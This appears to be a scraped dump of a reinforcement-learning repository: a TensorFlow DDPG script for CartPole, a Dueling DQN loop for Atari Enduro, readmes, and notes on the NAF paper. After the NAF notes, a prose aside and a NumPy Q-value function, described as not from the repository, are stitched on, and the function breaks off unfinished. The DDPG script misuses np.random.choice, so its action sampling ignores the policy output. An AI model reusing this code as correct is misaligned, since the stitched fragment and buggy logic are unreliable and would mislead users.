"text": "[FORMAT]\nmax-line-length=120\n\n[MESSAGES CONTROL]\ndisable = fixme,too-many-arguments,logging-format-interpolation,too-many-locals,multiple-statements,too-few-public-methods\n\n[BASIC]\n# Allow one and two character names in a number of places.\nargument-rgx=[a-z_][a-z0-9_]{0,30}$\nvariable-rgx=[a-z_][a-z0-9_]{0,30}$\nattr-rgx=[a-z_][a-z0-9_]{0,30}$\n"
},
{
"alpha_fraction": 0.5840978622436523,
"alphanum_fraction": 0.5902140736579895,
"avg_line_length": 32.367347717285156,
"blob_id": "098a028a4e8a959b53755ddfd36135b2dccaa54a",
"content_id": "0c1a63cf4c028af5cc8f38ef60d6e462a48ae065",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 49,
"path": "/semlm/model.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClasses for representing language models.\n\"\"\"\n\nclass LM(object):\n \"\"\"Represents a language model.\"\"\"\n pass\n\nclass WSLM(LM):\n \"\"\"The way I'm going to use this, the scores will be added\n to a baseline LM score (coming from the lattice/nbest).\n\n Model requires:\n vec - Feature vectorizer\n fe - feature extractor\n params - sklearn model/parameters\n \"\"\"\n\n def __init__(self, vec, fe, params, lmwt=14):\n self.vec = vec\n self.fe = fe\n self.params = params\n self.lmwt = lmwt\n\n # TODO: Is there anything dumb and slow going on here?\n # Don't have to recompute this if the parameter vector hasn't changed...\n # But what's a good place to save the values?\n def score(self, s):\n \"\"\"Compute the model's score for the given sentence.\"\"\"\n fv = s.feature_vector\n product = fv.dot(self.params.T)[0, 0]\n return s.score(lmwt=self.lmwt) + product\n\n def print_feature_weights(self, max_=None, threshold=None):\n \"\"\"Print up to `max_` feature weights, for weights above the given `threshold`.\"\"\"\n print('Feature weights:')\n feature_weights = []\n for i in range(len(self.vec.get_feature_names())):\n name = self.vec.get_feature_names()[i]\n val = self.params[0, i]\n if not threshold or abs(val) >= threshold:\n feature_weights.append((name, val))\n\n items = sorted(feature_weights, key=lambda x: abs(x[1]), reverse=True)\n if max_:\n items = items[:max_]\n\n for name, val in items:\n print('{:20} {:>8.2f}'.format(str(name), val))\n"
},
{
"alpha_fraction": 0.6578947305679321,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 8.5,
"blob_id": "2137fecef4023c8057078bb3c7e539738b2cf37b",
"content_id": "1d9c3713a96f8543ea44e6c22b1328edfcad64a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "asr_tools\nsklearn\nnumpy\nscipy==0.18.1\n"
},
{
"alpha_fraction": 0.5433255434036255,
"alphanum_fraction": 0.5433255434036255,
"avg_line_length": 14.527273178100586,
"blob_id": "f0219adc5f80b4598d813bc0201fb141c2cc6280",
"content_id": "8bc9d28719ae00ea996d1ce079723209e1b3af7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 55,
"path": "/docs/semlm.rst",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "semlm package\n=============\n\nSubmodules\n----------\n\nsemlm.example module\n--------------------\n\n.. automodule:: semlm.example\n :members:\n :undoc-members:\n\nsemlm.feature_extractor module\n------------------------------\n\n.. automodule:: semlm.feature_extractor\n :members:\n :undoc-members:\n\nsemlm.features module\n---------------------\n\n.. automodule:: semlm.features\n :members:\n :undoc-members:\n\nsemlm.model module\n------------------\n\n.. automodule:: semlm.model\n :members:\n :undoc-members:\n\nsemlm.perceptron module\n-----------------------\n\n.. automodule:: semlm.perceptron\n :members:\n :undoc-members:\n :show-inheritance:\n\nsemlm.pro module\n----------------\n\n.. automodule:: semlm.pro\n :members:\n :undoc-members:\n\nsemlm.sklearn module\n--------------------\n\n.. automodule:: semlm.sklearn\n :members:\n :undoc-members:\n"
},
{
"alpha_fraction": 0.6145966649055481,
"alphanum_fraction": 0.6235595345497131,
"avg_line_length": 27.925926208496094,
"blob_id": "f6c160e740998ca863d09ebb69bc790a9e83fdc1",
"content_id": "81df809cbd8d5c0115b304573458741b95c4ddc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 781,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 27,
"path": "/semlm/pro.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCreate paired examples for pairwise ranking optimization.\n\"\"\"\n\nimport random\nimport itertools\n\ndef nbest_pairs(nbests):\n \"\"\"Return an iterator of ALL pairs.\"\"\"\n for nbest in nbests:\n # Can't we just return this iterator?\n for s1, s2 in itertools.combinations(nbest.sentences, 2):\n yield (s1, s2)\n\ndef nbest_pairs_random(nbests, n):\n \"\"\"Return an iterator of n random pairs from each n-best.\"\"\"\n for nbest in nbests:\n for _ in range(n):\n if len(nbest.sentences) > 1:\n yield random.sample(nbest.sentences, 2)\n\ndef nbest_hyp_best_pairs(nbests):\n \"\"\"Return an iterator of best and oracle pairs.\"\"\"\n for nbest in nbests:\n hyp = nbest.hyp()\n best = nbest.oracle_hyp()\n yield(hyp, best)\n"
}
] | 9 |
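The pairwise perceptron in `semlm/perceptron.py` above only needs pair elements exposing `feature_vector` and `wer()` plus a model with `params` and `score()`. The following toy sketch shows a single update step; the stand-in classes, the two-feature vectors, and the cost-like reading of the score (the update raises the score of the higher-WER hypothesis) are all illustrative assumptions, not code from the repository:

import numpy as np
from semlm.perceptron import perceptron_update

class ToySentence:
    """Minimal stand-in for the real sentence object: a feature row vector plus a WER."""
    def __init__(self, fv, wer):
        self.feature_vector = np.array(fv, ndmin=2)
        self._wer = wer
    def wer(self):
        return self._wer

class ToyModel:
    """Minimal stand-in for WSLM: a linear score over the feature vector."""
    def __init__(self, params):
        self.params = np.array(params, ndmin=2)
    def score(self, s):
        return float(s.feature_vector.dot(self.params.T))

s1 = ToySentence([1.0, 0.0], wer=0.5)  # worse hypothesis (higher WER)
s2 = ToySentence([0.0, 1.0], wer=0.1)  # better hypothesis

model = ToyModel([[-0.5, 0.5]])        # scores s1 below s2, disagreeing with the WER order
perceptron_update((s1, s2), model, rate=0.01)
print(model.params)                    # -> [[-0.496  0.496]]: s1's features are pushed up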
MorganWoods/ReinforcementLearning
|
https://github.com/MorganWoods/ReinforcementLearning
|
5350718d978c1e0608cbbd3fafa07c585cd5a749
|
3be4385b59506e4a8775eba21093a83e4c224c7c
|
287c57ce5a5bfbf3ec30fe5c4b5debe2ee76beea
|
refs/heads/master
| 2020-04-25T04:04:42.104447 | 2020-03-23T03:03:01 | 2020-03-23T03:03:01 | 172,498,563 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5655609369277954,
"alphanum_fraction": 0.5785743594169617,
"avg_line_length": 41.80348205566406,
"blob_id": "27c0463f7de7d5d239d863223ae0ddaac63315b6",
"content_id": "dbee8b155e341b81229ac4a88b6359387a324555",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17213,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 402,
"path": "/Gym_Cartpole/DDPG_CartPole_v0.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 10 16:20:24 2019\n\n@author: menghao\n\nMy intergration version of ddpg\nRuning on Gym-CartPole_v0 environment\nmotivated by blog Patrick Emami ddpg and morvan's ddpg\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport gym\nimport tflearn\nfrom collections import deque\nimport datetime # for taking note\nimport random\n\ntf.reset_default_graph()\n# ===================================\n# Hyper parameters\n# ===================================\nMAX_EPISODES = 10000\nMAX_EP_STEPS = 200\nLR_A = 0.0001\nLR_C = 0.001\nGAMMA = 0.99 # reward discount\nTAU = 0.001 # soft replacement\nMEMORY_CAPACITY = 10000000 #0000\nBATCH_SIZE = 64\nRENDER = False\nENV_NAME = 'CartPole-v0'\nSEED = True\n\nNOISE_LEVEL = 0. # env noise\nNOISE_ENTRY = 4\nnoise_flag = 0\n\nLOGPATH = 'log/ddpg'\nNOTE = 'ddpg add 3 entries noise free on state'\nACTIONS = [0,1]\n\n# ===================================\n# Functions\n# ===================================\ndef takeNote(note): # todo: add network structure\n f = open(\"LOG_DDPG.txt\", \"a+\")\n f.write(\"\\nDDPG=====%s====\\n\" % datetime.datetime.now())\n f.write(\"env:%s, max_ep:%s, max_ep_steps:%s, LR_A:%s, LR_C:%s, GAMMA:%s, TAU:%s, Memory:%s, Batchsize:%s, NoiseLevel:%s, LogPath:%s, Seed:%s \\n\"\n % (ENV_NAME,MAX_EPISODES,MAX_EP_STEPS,LR_A,LR_C,GAMMA,TAU,MEMORY_CAPACITY,BATCH_SIZE,NOISE_LEVEL,LOGPATH,SEED))\n f.write(note)\n f.close()\n\ndef printenv(e):\n observation_high = e.observation_space.high\n observation_low = e.observation_space.low\n observation_shape = e.observation_space.shape\n reward_range = e.reward_range\n #action_high = e.action_space.high\n #action_low = e.action_space.low\n action_shape = e.action_space.shape\n #env_configure = e.configure\n print('\\n----------env info-------------\\n')\n #print(env_configure)\n print('\\nobservation shape and bound:', observation_shape, observation_high, observation_low,\n '\\naction shape and bound:', action_shape, #action_high, action_low,\n '\\nreward range:', reward_range)\n print('-------------------------------\\n')\n state_dim = observation_shape[0] #+ NOISE_ENTRY\n action_dim = 1\n #action_bound = action_high\n # ensure action bound is symmetric\n #assert (action_high == -action_low)\n action_bound = 1\n return state_dim, action_dim, action_bound\n\ndef state_noise(s,level,num_entry):\n global noise_flag\n if noise_flag <= 5000: \n noise = np.random.uniform(low=-1,high=1,size=(num_entry,))\n# noise = np.array([np.random.uniform(-1,1),np.random.uniform(-1,1),np.random.uniform(-1,1)])# todo: change the dimensional as shape\n noise = level * noise\n if noise_flag > 5000:\n noise = s\n noise_flag += 1\n if noise_flag ==10000:\n noise_flag = 0\n \n s = np.append(s,noise,axis=0) \n #print('noiseflag', noise_flag)\n #s = s + noise \n return s\n\ndef build_summaries():\n episode_reward = tf.Variable(0.)\n tf.summary.scalar(\"Reward\", episode_reward)\n episode_ave_max_q = tf.Variable(0.)\n tf.summary.scalar(\"Qmax_Value\", episode_ave_max_q)\n\n summary_vars = [episode_reward, episode_ave_max_q]\n summary_ops = tf.summary.merge_all()\n\n return summary_ops, summary_vars\n# ===================================\n# Class\n# ===================================\nclass replayBuffer(object):\n def __init__(self, buffer_size):\n # the right side of the deque contains the most recent experience\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque(maxlen = buffer_size)\n \n def add(self, s, a, r, t, s2):\n 
experience = (s, a, r, t, s2)\n self.buffer.append(experience)\n if self.count < self.buffer_size:\n self.count += 1\n def size(self):\n return self.count\n \n def sample_batch(self, batch_size):\n batch = []\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n s_batch = np.array([_[0] for _ in batch])\n a_batch = np.array([_[1] for _ in batch])\n r_batch = np.array([_[2] for _ in batch])\n t_batch = np.array([_[3] for _ in batch])\n s2_batch = np.array([_[4] for _ in batch])\n return s_batch, a_batch, r_batch, t_batch, s2_batch \n def clear(self):\n self.buffer.clear()\n self.count = 0\n \nclass DDPG(object):\n def __init__(self, sess, a_dim, s_dim, a_bound, lr_a, lr_c, tau, batch_size, gamma):\n '''-------Hyperparameters-------'''\n self.sess = sess\n self.a_dim = a_dim\n self.s_dim = s_dim\n self.a_bound = a_bound\n self.lr_a = lr_a\n self.lr_c = lr_c\n self.tau = tau\n self.batch_size = batch_size\n self.gamma = gamma\n \n '''-------actor-------'''\n # Actor network\n self.a_inputs, self.a_out, self.a_scaled_out = self.actorNetwork()\n self.a_eval_params = tf.trainable_variables()\n #self.network_params = tf.trainable_variables()\n # Target network\n self.target_inputs, self.target_out, self.a_target_scaled_out = self.actorNetwork()\n #self.target_network_params = tf.trainable_variables()[len(self.network_params):]\n # Networks parameters \n# self.a_eval_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval')\n# self.a_targ_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target') \n# self.a_eval_params = tf.trainable_variables()\n self.a_targ_params = tf.trainable_variables()[len(self.a_eval_params):]\n \n # Op for periodically updating actor target network with online network\n self.a_update_target_network_params = \\\n [self.a_targ_params[i].assign(tf.multiply(self.a_eval_params[i], self.tau) + \n tf.multiply(self.a_targ_params[i], 1. - self.tau))\n for i in range(len(self.a_targ_params))]\n \n # Gradient from critic network\n self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim]) \n # Combine the gradients here\n self.unnormalized_actor_gradients = tf.gradients(self.a_scaled_out, self.a_eval_params, -self.action_gradient)\n self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))\n # Optimization Op for actor\n self.a_optimize = tf.train.AdamOptimizer(self.lr_a).apply_gradients(zip(self.actor_gradients, self.a_eval_params))\n self.a_num_trainable_vars = len(self.a_eval_params) + len(self.a_targ_params)\n \n '''-------critic-------'''\n \n # Critic network\n self.c_inputs, self.c_action, self.c_out = self.criticNetwork()\n self.c_eval_params = tf.trainable_variables()[self.a_num_trainable_vars:]\n\n # Target network\n self.c_target_inputs, self.c_target_action, self.c_target_out = self.criticNetwork() \n # Networks parameters\n# self.c_eval_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/eval')\n# self.c_targ_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/target')\n self.c_targ_params = tf.trainable_variables()[(len(self.c_eval_params) + self.a_num_trainable_vars):] \n # Op for periodically updating critic target network with online network\n self.c_update_target_network_params = \\\n [self.c_targ_params[i].assign(tf.multiply(self.c_eval_params[i], self.tau) + \n tf.multiply(self.c_targ_params[i], 1. 
- self.tau))\n for i in range(len(self.c_targ_params))]\n # Network target (y_i)\n self.predicted_q_value = tf.placeholder(tf.float32, [None, 1]) # one Q value for each env.step(a)\n # Optimization Op for critic\n self.c_loss = tflearn.mean_square(self.predicted_q_value, self.c_out) \n self.c_optimize = tf.train.AdamOptimizer(self.lr_c).minimize(self.c_loss)\n # get the gradient of the net w.r.t. the action\n self.c_action_grads = tf.gradients(self.c_out, self.c_action)\n #\n \n '''-------critic functions-------'''\n def criticNetwork(self): \n inputs = tflearn.input_data(shape=[None, self.s_dim])\n action = tflearn.input_data(shape=[None, self.a_dim])\n# tf.summary.histogram('inputs',inputs)\n# tf.summary.histogram('action',action)\n net_1 = tflearn.fully_connected(inputs, 400)\n net_1 = tflearn.layers.normalization.batch_normalization(net_1)\n net_1 = tflearn.activations.relu(net_1)\n # Add the action tensor in the 2nd hidden layer\n t1 = tflearn.fully_connected(net_1, 300)\n t2 = tflearn.fully_connected(action, 300)\n net_2 = tflearn.activation(tf.matmul(net_1, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')\n # Linear layer connected to 1 output representing Q(s,a)\n # Weights are init to Uniform\n w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)\n out = tflearn.fully_connected(net_2, 1, weights_init=w_init)\n return inputs, action, out\n \n def c_train(self, inputs, action, predicted_q_value):\n return self.sess.run([self.c_out, self.c_optimize], feed_dict={self.c_inputs: inputs, self.c_action: action,\n self.predicted_q_value: predicted_q_value}) \n def c_predict(self, inputs, action):\n return self.sess.run(self.c_out, feed_dict={self.c_inputs: inputs, self.c_action: action})\n \n def c_predict_target(self, inputs, action):\n return self.sess.run(self.c_target_out, feed_dict={self.c_target_inputs: inputs, self.c_target_action: action})\n \n def c_action_gradients(self, inputs, actions):\n return self.sess.run(self.c_action_grads, feed_dict={self.c_inputs: inputs, self.c_action: actions})\n \n def c_update_target_network(self):\n self.sess.run(self.c_update_target_network_params)\n \n '''-------actor functions-------'''\n def actorNetwork(self): \n inputs = tflearn.input_data(shape=[None, self.s_dim]) # None for batch learning\n net_1 = tflearn.fully_connected(inputs, 400)\n net_1 = tflearn.layers.normalization.batch_normalization(net_1)\n net_1 = tflearn.activations.relu(net_1)\n net_2 = tflearn.fully_connected(net_1, 300)\n net_2 = tflearn.layers.normalization.batch_normalization(net_2)\n net_2 = tflearn.activations.relu(net_2)\n # Final layer weights are init to Uniform[-3e-3, 3e-3]\n w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003) \n out = tflearn.fully_connected(net_2, self.a_dim, activation='softmax', weights_init=w_init) # tanh from -1 to 1\n # Scale output to positive and negative action bound\n scaled_out = out\n print('outshape', out.shape)\n #scaled_out = tf.multiply(out, self.a_bound)\n return inputs, out, scaled_out\n \n def a_train(self, inputs, a_gradient):\n self.sess.run(self.a_optimize, feed_dict={self.a_inputs: inputs, self.action_gradient: a_gradient})\n \n def a_predict(self, inputs):\n return self.sess.run(self.a_scaled_out, feed_dict={self.a_inputs: inputs})\n \n def a_predict_target(self, inputs):\n return self.sess.run(self.a_target_scaled_out, feed_dict={self.target_inputs: inputs})\n \n def a_update_target_network(self):\n self.sess.run(self.a_update_target_network_params)\n \n def 
a_get_num_trainable_vars(self):\n return self.a_num_trainable_vars\n\n\n# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is\n# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab \nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):\n self.theta = theta\n self.mu = mu\n self.sigma = sigma\n self.dt = dt\n self.x0 = x0\n self.reset()\n\n def __call__(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)\n self.x_prev = x\n return x\n\n def reset(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n\n def __repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)\n \n# ===================================\n# Train \n# =================================== \ndef train(sess, env, module, max_ep, max_step, logpath, buffer, render, actor_noise,stateNoiseLevel,num_entry):\n summary_ops, summary_vars = build_summaries()\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter(logpath, sess.graph)\n # Initialize target network weights? why\n module.a_update_target_network()\n module.c_update_target_network()\n #replay_buffer=buffer\n # Needed to enable BatchNorm. \n # This hurts the performance on Pendulum but could be useful\n # in other environments.\n # tflearn.is_training(True)\n #print('mark132')\n\n for i in range(max_ep):\n s = env.reset() \n #s = state_noise(s, stateNoiseLevel, num_entry)\n ep_reward = 0\n ep_ave_max_q = 0\n \n for j in range(max_step):\n if render:\n env.render()\n # add exploration noise\n p_a = module.a_predict(np.reshape(s, (1, module.s_dim))) #+ actor_noise()\n a = int(np.random.choice(ACTIONS,1,[p_a, 1-p_a]))\n s2, r, terminal, info = env.step(a)\n # s2 = state_noise(s2, stateNoiseLevel, num_entry)\n buffer.add(np.reshape(s, (module.s_dim,)), a, r, terminal, np.reshape(s2, (module.s_dim,)))\n \n # Keep adding experience to the memory until there are at least minibatch size samples\n if buffer.size() > module.batch_size:\n s_batch, a_batch, r_batch, t_batch, s2_batch = buffer.sample_batch(module.batch_size) \n \n # Calculate targets\n #a_action = module.a_predict_target(s2_batch)\n a_batch = np.reshape(a_batch,(len(a_batch),1))\n target_q = module.c_predict_target(s2_batch, module.a_predict_target(s2_batch))\n \n y_i = []\n for k in range(module.batch_size):\n if t_batch[k]:\n y_i.append(r_batch[k])\n else:\n y_i.append(r_batch[k] + module.gamma * target_q[k])\n \n # Update the critic given the targets\n predicted_q_value, _ = module.c_train(s_batch, a_batch, np.reshape(y_i, (module.batch_size, 1)))\n ep_ave_max_q += np.amax(predicted_q_value)\n \n # Update the actor policy using the sampled gradient\n a_outs = module.a_predict(s_batch)\n grads = module.c_action_gradients(s_batch, a_outs)\n module.a_train(s_batch, grads[0])\n \n # Update target networks\n module.a_update_target_network()\n module.c_update_target_network()\n \n s = s2\n ep_reward += r\n \n if terminal or j == max_step - 1:\n \n summary_str = sess.run(summary_ops, feed_dict={summary_vars[0]: ep_reward,\n summary_vars[1]: ep_ave_max_q / float(j)})\n writer.add_summary(summary_str, i)\n writer.flush()\n \n print('| Reward: {:d} | Episode: {:d} | Qmax: {:.4f} | Steps: {:d}'.format(int(ep_reward), \\\n i, (ep_ave_max_q / float(j)), j))\n break\n \n# ===================================\n# 
Main \n# =================================== \ndef main():\n with tf.Session() as sess:\n \n env = gym.make(ENV_NAME)\n #env = env.unwrapped\n s_dim, a_dim, a_bound = printenv(env)\n if SEED: \n env.seed(1)\n tf.set_random_seed(2)\n np.random.seed(3)\n random.seed(4)\n # sess, a_dim, s_dim, a_bound, lr_a, lr_c, tau, batch_size, gamma\n #print('mark0')\n module = DDPG(sess, a_dim, s_dim, a_bound, lr_a=LR_A, lr_c=LR_C, tau=TAU, batch_size=BATCH_SIZE, gamma=GAMMA)\n #print('mark1')\n buffer = replayBuffer(buffer_size=MEMORY_CAPACITY)\n actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(a_dim)) \n #print('mark12')\n\n train(sess, env, module, max_ep=MAX_EPISODES, max_step=MAX_EP_STEPS, logpath=LOGPATH,\n buffer=buffer, render=RENDER, actor_noise=actor_noise, stateNoiseLevel=NOISE_LEVEL, num_entry=NOISE_ENTRY\n )\n \nif __name__ == '__main__': \n takeNote(note=NOTE)\n main()\n\n\n\n\n\n\n"
},
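The DDPG script above maintains target networks for both the actor and the critic via `assign` ops parameterized by TAU. As a quick illustration of what those ops compute, here is the same soft update written as a plain Python sketch (illustrative only; `target_params` and `eval_params` stand in for hypothetical lists of parameter values, not the script's TensorFlow variables):

```python
def soft_update(target_params, eval_params, tau=0.001):
    """Polyak averaging: target <- tau * eval + (1 - tau) * target,
    applied element-wise to every parameter, as the script's
    a_update_target_network_params / c_update_target_network_params ops do."""
    return [tau * e + (1.0 - tau) * t
            for t, e in zip(target_params, eval_params)]

# With tau = 0.001 the target network trails the online network slowly,
# which stabilizes the bootstrapped critic targets.
```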
{
"alpha_fraction": 0.7318840622901917,
"alphanum_fraction": 0.7318840622901917,
"avg_line_length": 26.399999618530273,
"blob_id": "fdf51c3e6be524a127c972c667c21b0598cb6325",
"content_id": "348a77835e91a7f1d022b6c1ea3a5a6725efb393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 228,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 5,
"path": "/Mono_network/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "单网络是我的一种设想. 参考 NAF 那篇论文,\n\n只有一个 pg 网络,输出动作后想办法把 Q 弄出来, 然后用 Q 对 a 求梯度更新网络.\n\n- research on NAF method first, then think about to modify it.\n\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 27,
"blob_id": "5b4f31b24c86f8c0a67d0fd8a46f3e74cf62136a",
"content_id": "76bc1d640370b8357c761e5fba98adf2726abdb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/Gym_MountainCar/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "## mountain car environment\n"
},
{
"alpha_fraction": 0.4893081784248352,
"alphanum_fraction": 0.5053459405899048,
"avg_line_length": 33.064517974853516,
"blob_id": "86378f906d6366659bafa7cb4255f6aebe742242",
"content_id": "7df101b0e670c3f05b3d1a9005dcb82c417f5b37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3180,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 93,
"path": "/Gym_Enduro/WuEnduro.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 28 13:38:52 2018\n\nrunning Enduro with tensorflow\n\nEnduro env source page: https://github.com/openai/gym/blob/master/gym/envs/atari/atari_env.py\nfuture: add soft update\n@author: menghaw1\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport gym\nimport matplotlib.pyplot as plt\n\nfrom preprocess import Preprocess # process state and reward\nfrom configure import *\nfrom DuelingDQN import *\n\ntf.reset_default_graph() # for reseting the variable info, otherwise it cannot re run\n#------------ other ---------------#\n# np.random.seed(1)\n# tf.set_random_seed(1)\n'''########### training ###########'''\n\ndef train(): \n total_step = 0\n \n for ep in range (NUM_EPISODES):\n s = env.reset()\n s = process.process_state(s) #(1,80,80,4) \n ep_reward = 0\n ep_step = 0\n ep_loss = 0\n \n for st in range (NUM_EP_STEPS):\n if RENDER:\n env.render()\n \n \n a = module.choose_action(s) # Todo # s: float32 (1, 80, 80), array\n s_, r, done, info = env.step(a) \n s_ = process.process_state(s_)\n #r = process.process_reward(r) \n module.remember(s, a, r, s_) \n# if done == 1:\n# print ('done:',1)\n ep_reward += r\n ep_step += 1\n \n if (total_step > MEMEOY_SIZE) and (st % TRAIN_FREQUENCY==0):\n module.learn() # Todo \n s = s_\n total_step += 1\n\n if (st == NUM_EP_STEPS - 1) or done:\n result = tf.Summary(value = [\n #tf.Summary.Value(tag='ep_step', simple_value=ep_step),\n tf.Summary.Value(tag='ep_reward', simple_value=ep_reward)\n ])\n writer.add_summary(result, ep)\n print('Ep:', ep, '|ep_reward:', ep_reward,'|step:',st)\n break \n \n # choose action with module.\n \n'''########### begining ###########'''\n\nif __name__ == '__main__':\n sess = tf.Session()\n #merged = tf.summary.merge_all() \n env = gym.make(ENV_NAME)\n #env.seed(1)\n print('----source env info----'\n '\\n action space:', env.action_space,\n '\\n state shape:', env.observation_space,\n '\\n reward range:', env.reward_range, # in reality, it ranges [-1, 1]\n '\\n render modes:', env.metadata,\n '\\n Env spec:', env.spec,\n '\\n-----------------------') \n s_dim = env.observation_space\n a_dim = env.action_space.n \n \n process = Preprocess\n# processState = Preprocess.process_state()\n# processReward = Preprocess.process_reward()\n #print('============mark-0==============')\n# sess.run(tf.global_variables_initializer())\n module = DuelingDQN(n_actions=a_dim, n_features=[None,80,80,4], learning_rate=LR, reward_decay=GAMMA, replace_target_iter=REPLACE_TARGET, sess=sess) \n #print('============mark0.5==============')\n writer = tf.summary.FileWriter(LOG_PATH, sess.graph)\n train()\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 60,
"blob_id": "14de8a601aca4ce98bbaff07915ddfc05ff7f868",
"content_id": "dc977c97a381a62c19b4e50e4c4b3141f9a4a898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 62,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 1,
"path": "/GymSeries/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "## This folder inculdes the RL code runed in Gym environment\n\n"
},
{
"alpha_fraction": 0.7750611305236816,
"alphanum_fraction": 0.7799510955810547,
"avg_line_length": 57.33333206176758,
"blob_id": "134ef460db44a49130827c6eba0416347e56767c",
"content_id": "14fb5ce2d10c9be6b157a09c1ac3a5de5c5f6f6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 21,
"path": "/Mono_network/NAF.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "# Continuous Deep Q-Learning with Model-based Acceleration (NAF)\n\n> Shixiang Gu, University of Cambridge , 2016\n\n\n\n- Abstract\n\t- The sample complexity of model free algorithm limit their applicability to physical system.\n\t- We derive a continuous variant of the Q-learning algorithm we call NAF. \n\t- Combining NAF with models to accelerate learning.\n- Related work\n\t- Model free algorithms tend to be more generally applicable but substantially slower.\n- Background\n\t- Model-free RL: Policy gradient methods provide a simple, direct approach to RL, which can succeed on high-dimensinal problems, but potentially requires a large number of samples.\n\t- Off-policy algorithms that use value or Q-function approximation can in principle achieve better data efficiency. However it requires optimizing two function approximators on different objectives.\n\t- Advantage = Q - V\n\t- If we know the dynamic p(x1|x0,u), we can use model-based RL and optimal control.\n- NAF\n\t- The idea behind NAF is to represent the Q function in Q-learning in such a way that its maximum, argmaxQ.\n\t- P is a state-dependent, positive-definite square matrix\n\t- \n\n\n"
},
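The last two bullets of the note gesture at NAF's core construction without writing it out. Below is a minimal NumPy sketch of the NAF Q head described in the paper; it is not code from this repository, and `mu`, `v`, and `l_entries` stand in for hypothetical network outputs:

```python
import numpy as np

def naf_q_value(u, mu, v, l_entries, a_dim):
    """Sketch of the NAF Q construction (illustrative, not repo code).

    u         -- action to evaluate, shape (a_dim,)
    mu        -- network's action head output (the argmax of Q), shape (a_dim,)
    v         -- network's state-value head output, scalar
    l_entries -- network outputs for a lower-triangular matrix L,
                 length a_dim * (a_dim + 1) // 2
    """
    # Rebuild L from its flat entries and exponentiate the diagonal,
    # so that P = L @ L.T is positive definite by construction.
    L = np.zeros((a_dim, a_dim))
    L[np.tril_indices(a_dim)] = l_entries
    L[np.diag_indices(a_dim)] = np.exp(np.diag(L))
    P = L @ L.T
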